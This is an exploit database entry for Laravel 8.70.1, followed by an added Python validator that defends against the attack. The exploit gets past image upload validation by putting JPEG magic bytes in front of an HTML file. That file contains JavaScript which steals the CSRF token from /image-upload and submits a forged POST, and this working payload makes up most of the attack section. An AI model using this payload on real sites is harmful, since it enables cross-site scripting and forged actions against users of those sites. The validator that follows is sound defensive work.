https://sploitus.com/exploit?id=PACKETSTORM:164972
# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)  
# Date: 14/11/2021  
# Exploit Author: Hosein Vita  
# Vendor Homepage: https://laravel.com/  
# Software Link: https://laravel.com/docs/4.2  
# Version: Laravel Framework 8.70.1  
# Tested on: Windows/Linux  
  
# Description: We can bypass Laravel's image file upload validation to upload arbitrary files on the web server,
# which lets us run arbitrary JavaScript and bypass the CSRF token. For more information read this post: https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
  
# Steps to reproduce:  
1- Use the HxD tool and add FF D8 FF E0 (the JPEG magic bytes) at the very beginning of your file
2- Use the code below to bypass the CSRF token
  
ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
// Path the forged POST is sent to; edit as needed
var POST_URL = "/";

function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);

// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
console.log(xhr.responseText);
}
};
xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tells it to return the response as an HTML document
xhr.responseType = "document";
// true at the end here makes the call asynchronous
// Edit the path as you want
xhr.open("GET", "/image-upload", true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
var page = xhr.response;
// Get the input element (the hidden _token field)
var input = page.getElementsByTagName("input")[0];
// Show the token
alert("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}

getTokenJS();
</script>
</body>
</html>
  
3- Save it as an HTML file and upload it.
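The bypass works because the upload check only sniffs the first bytes (FF D8 FF E0) and accepts whatever follows. The validator below is an added defensive example, not code from the advisory or from Laravel: it walks the JPEG marker segments, so the prefixed HTML is rejected because the bytes after the APP0 marker do not form a consistent segment chain. The sample inputs are constructed for the example. This structural check is one layer; re-encoding uploaded images and serving uploads with a non-HTML Content-Type from a separate origin remain the stronger controls.

```python
import struct

# Constructed samples: a minimal but well-formed JPEG skeleton (APP0 -> SOS -> EOI)
# and the advisory's trick of prefixing the JPEG magic bytes to an HTML document.
MINIMAL_JPEG = (
    b"\xff\xd8"                                            # SOI
    + b"\xff\xe0" + struct.pack(">H", 16)                  # APP0, length 16
    + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"      # 14-byte JFIF payload
    + b"\xff\xda" + struct.pack(">H", 8)                   # SOS, length 8 (1 component)
    + b"\x01\x01\x00\x00\x3f\x00"                          # SOS payload
    + b"\x12\x34"                                          # entropy-coded data (dummy)
    + b"\xff\xd9"                                          # EOI
)
POLYGLOT = b"\xff\xd8\xff\xe0<html><script>alert(1)</script></html>"


def is_structurally_valid_jpeg(data: bytes) -> bool:
    """Walk JPEG marker segments instead of trusting only the first four bytes.

    Every segment before the scan must start with 0xFF <marker> and carry a
    big-endian length that stays inside the file; the file must reach an SOS
    segment and end with EOI. A prefixed HTML body breaks the chain: the bytes
    '<h' are read as an APP0 length (0x3C68) that runs past the end of the file.
    """
    if len(data) < 4 or data[:2] != b"\xff\xd8":
        return False
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return False  # expected a marker byte, found payload/HTML instead
        marker = data[pos + 1]
        if marker == 0xD9:
            return False  # EOI before any scan data: nothing decodable
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if length < 2 or pos + 2 + length > len(data):
            return False  # declared segment length is inconsistent with the file
        if marker == 0xDA:
            # SOS: entropy-coded data follows until the EOI marker.
            return data.endswith(b"\xff\xd9")
        pos += 2 + length
    return False  # ran out of bytes without reaching SOS


if __name__ == "__main__":
    print("minimal jpeg:", is_structurally_valid_jpeg(MINIMAL_JPEG))  # True
    print("html polyglot:", is_structurally_valid_jpeg(POLYGLOT))     # False
```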